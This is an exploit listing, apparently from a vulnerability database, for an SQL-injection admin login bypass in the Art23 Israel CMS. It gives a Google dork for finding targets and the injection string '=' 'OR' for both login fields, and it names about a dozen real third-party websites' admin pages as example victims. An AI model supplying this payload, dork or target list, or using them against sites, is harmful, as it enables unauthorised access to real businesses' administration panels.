Art23 Israel Cms Admin Bypass

2016.04.14
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

###################### # Exploit Title : Art23 Israel Cms Admin Bypass # Exploit Author : Ashiyane Digital Security Team # Contact: n3t.hacker@gmail.com # Vendor Homepage : http://www.art23.co.il/ # Google Dork: intext:"Art23" , intitle:"Art23" & inurl:"admin" # Date: 11 Apr 2016 # Tested On : Kali / iceweasel ###################### # # Search dork and select Target , put /admin/login.php after url such as : # http://site.com/admin/login.php # Now enter fill Login(username) and Senha(Password) like the information below : # Login : '=' 'OR' # Senha : '=' 'OR' # # e.g: # http://roni-ort.co.il/admin/login.php # http://vilamaya.co.il/admin/login.php # http://sinai-carpets.com/admin/login.php # http://simonab.co.il/admin/login.php # http://topnail.co.il/admin/login.php # http://smartkid.co.il/admin/login.php # http://hy-spa.co.il/admin/login.php # http://mihart.co.il/admin/login.php # http://yptolo.co.il/admin/login.php # http://www.tipul-beomanut.co.il/admin/login.php # http://grands.co.il/admin/login.php # http://www.amos-hatzadik.co.il/admin/login.php # # ###################### # discovered by : Net Hacker ######################


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top